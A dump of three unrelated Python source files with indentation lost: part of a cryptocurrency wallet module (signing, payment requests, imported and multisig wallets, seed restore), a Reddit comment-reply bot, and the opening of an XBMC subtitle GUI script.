continue
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password, *, use_cache=False):
""" Sign a transaction, requires password (may be None for password-less
wallets). If `use_cache` is enabled then signing will be much faster.
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Warning: If you modify non-signature parts of the transaction
afterwards, do not use `use_cache`! """
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password, use_cache=use_cache)
except UserCancelled:
continue
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_full_ui_string()
amount_text = format_satoshis(r['amount']) # fixme: this should not be localized
out['URI'] = '{}?amount={}'.format(addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
if not 'index_url' in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(bitcoin.Hash(
addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_full_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
def f(x):
try:
addr = x['address']
return self.get_address_index(addr) or addr
except:
return addr
return sorted(m, key=f)
except TypeError:
# See issue #1231 -- can get inhomogenous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
''' This is an advanced function for use in the GUI when the user
wants to resynch the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.change_reserved.clear()
self.change_reserved_default.clear()
self.change_unreserved.clear()
self.change_reserved_tmp.clear()
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_change_reservations()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
''' Returns True if this wallet type is compatible.
`reason` is an optional list where you would like a translated string
of why Schnorr isn't possible placed (on False return). '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future after enough
# time has passed that air-gapped systems are unlikely to not
# have Schnorr enabled by default.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
''' Enable schnorr for this wallet. Note that if Schnorr is not possible,
(due to missing libs or invalid wallet type) is_schnorr_enabled() will
still return False after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
if self.keystore is not None and self.keystore.can_change_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows user to re-add PK again and it
# will avoid the situation where the UI says "not verified"
# erroneously!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
def save_keystore(self):
pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_full_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
return pubkey.address.to_full_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False, save=True):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
if save:
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change, save=False)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change, save=False)
def synchronize(self):
with self.lock:
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise bitcoin.InvalidPassword()
for name, keystore in self.keystores.items():
if keystore.can_change_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def has_seed(self):
return self.keystore.has_seed()
def can_change_password(self):
return self.keystore.can_change_password()
def is_watching_only(self):
return not any([not k.is_watching_only() for k in self.get_keystores()])
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'multisig', 'imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
def create_new_wallet(*, path, config, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
if seed_type == 'electrum':
seed = mnemo.Mnemonic_Electrum('en').make_seed()
else:
seed = mnemo.make_bip39_words('english')
k = keystore.from_seed(seed, passphrase, seed_type = seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
storage.put('seed_type', seed_type)
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
elif keystore.is_private_key_list(text,):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif mnemo.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
|
commentroulette.py
|
import praw
import random
from threading import Thread
import time
import requests
r = praw.Reddit('comment_roulette'
'Url:http://imtoopoorforaurl.com')
r.login()
def findNegCommentsAndDelete():
while(1):
comments = r.user.get_comments('new')
for comment in comments:
if(comment.score < 0):
comment.delete()
time.sleep(500)
thread = Thread(target = findNegCommentsAndDelete)
thread.start()
appendPhrase = '\n\n --------\n^[Huh?](https://www.reddit.com/r/comment_roulette/wiki/index) ^(I delete negative comments.)'
while True:
try:
print "checking...\n"
#Check my messages
for message in r.get_unread(unset_has_mail=True, update_user=True):
if("/u/comment_roulette" in message.body.lower()):
print "Got new message!"
parent = r.get_info(thing_id=message.parent_id)
file = open("responses.txt", 'r+')
responseOptions = file.read().splitlines()
message.reply(responseOptions[random.randrange(0,len(responseOptions))]+appendPhrase)
if(parent.author.name == "agreeswithmebot"):
quote = 'Uh oh, we got ourselves a smart guy here! Try again :)'
newComment = message.reply(quote)
user = message.author
r.send_message(user.name, 'AgreesWithMeBot', 'Hey, you seem pretty clever. Maybe contribute to our [github](https://github.com/jhaenchen/agreeswithmebot)?')
elif(isinstance(parent, praw.objects.Comment)):
messageText = parent.body
messageText = messageText.replace("/u/comment_roulette","")
messageText = messageText.replace("\n","\\n")
file.write(messageText + "\\n\\n -/u/" + message.author.name + "\n")
file.flush()
file.close()
message.mark_as_read()
print "sleeping..."
time.sleep(15)
except requests.exceptions.ReadTimeout:
print "Read timeout. Will try again."
except praw.errors.Forbidden:
print "Im banned from there."
user = message.author
message.mark_as_read()
r.send_message(user.name, 'comment_roulette', 'Hey, I\'m banned from \\r\\'+message.subreddit.display_name+'. Sorry.')
except praw.errors.HTTPException as e:
pprint(vars(e))
print(e)
print "Http exception. Will try again."
except praw.errors.RateLimitExceeded as error:
print '\tSleeping for %d seconds' % error.sleep_time
time.sleep(error.sleep_time)
except requests.exceptions.ConnectionError:
print "ConnectionError. Will try again."
except praw.errors.APIException:
print "API exception. Will try again."
except (KeyboardInterrupt, SystemExit):
print "Safe exit..."
raise
except:
print "Unhandled exception, bail!"
r.send_message('therealjakeh', 'comment_roulette', 'Just went down! Help! Exception: ')
raise
|
gui.py
|
import sys
import os
import xbmc
import xbmcgui
import xbmcplugin
import threading
import socket
import urllib
from Queue import Queue
import plugins
import ConfigParser
import logging
import difflib
try: current_dlg_id = xbmcgui.getCurrentWindowDialogId()
except: current_dlg_id = 0
current_win_id = xbmcgui.getCurrentWindowId()
_ = sys.modules[ "__main__" ].__language__
__scriptname__ = sys.modules[ "__main__" ].__scriptname__
__version__ = sys.modules[ "__main__" ].__version__
STATUS_LABEL = 100
LOADING_IMAGE = 110
SUBTITLES_LIST = 120
trans_lang = {'aa' : 'Afar',
'ab' : 'Abkhaz',
'ae' : 'Avestan',
'af' : 'Afrikaans',
'ak' : 'Akan',
'am' : 'Amharic',
'an' : 'Aragonese',
'ar' : 'Arabic',
'as' : 'Assamese',
'av' : 'Avaric',
'ay' : 'Aymara',
'az' : 'Azerbaijani',
